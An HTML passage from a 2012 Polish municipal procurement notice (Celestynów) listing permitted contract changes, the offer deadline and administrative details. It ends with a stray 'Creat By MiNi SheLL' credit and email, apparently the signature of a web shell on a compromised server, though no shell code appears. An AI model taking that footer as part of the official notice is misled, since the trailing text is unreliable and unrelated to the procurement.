<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności Siły Wyższej, 
17.3.2. wydłużenia terminu wykonania przedmiotu umowy, spowodowanego następującymi okolicznościami: 
a) 	brakami lub wadami w dokumentacji projektowej lub w innych dokumentach budowy, których obowiązek sporządzenia spoczywał na Zamawiającym, 
b) 	opóźnieniami w zakresie dokonywania odbiorów spowodowanymi przez Zamawiającego, 
c) szczególnie niesprzyjającymi warunkami atmosferycznymi, 
d)	zawieszeniem przez Zamawiającego wykonania robót,  
e) okolicznościami siły wyższej,
f) odkryciem wykopalisk uniemożliwiających wykonywanie robót, 
g) wstrzymaniem robót na mocy decyzji organów uprawnionych do wstrzymania lub
h) przerwania robót z przyczyn niezależnych od Zamawiającego i Wykonawcy, 
i) zmian w wyniku postępu techniczno - technologicznego lub wycofania z produkcji zastosowanych materiałów, wyposażenia, urządzeń lub technologii gwarantujących uzyskanie parametrów nie   gorszych od zaprojektowanych, a ich zastosowanie nie spowoduje wzrostu ogólnej wartości przedmiotu umowy,
j) zmian korzystnych dla Zamawiającego.
17.3.3. Zmiany w zakresie nazwy zadania, danych Stron, w szczególności ich adresów, przedstawicieli Stron, innych osób wskazanych imiennie w umowie będą dokonywane w formie pisemnej  pod rygorem nieważności.
17.3.4. W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, 
	których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności             i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy,
17.3.5.Wystąpienia konieczności zmiany osób (choroba, rezygnacja lub inne zdarzenia losowe), przy pomocy których Wykonawca lub Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia,
17.3.6.Wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
17.3.7.Wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.celestynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Celestynowie
ul. Regucka 3
05-430 Celestynów
pok. nr 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2012 godzina 10:00, miejsce: Urząd Gminy w Celestynowie
Biuro Obsługi Mieszkańca
ul. Regucka 3
05-430 Celestynów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com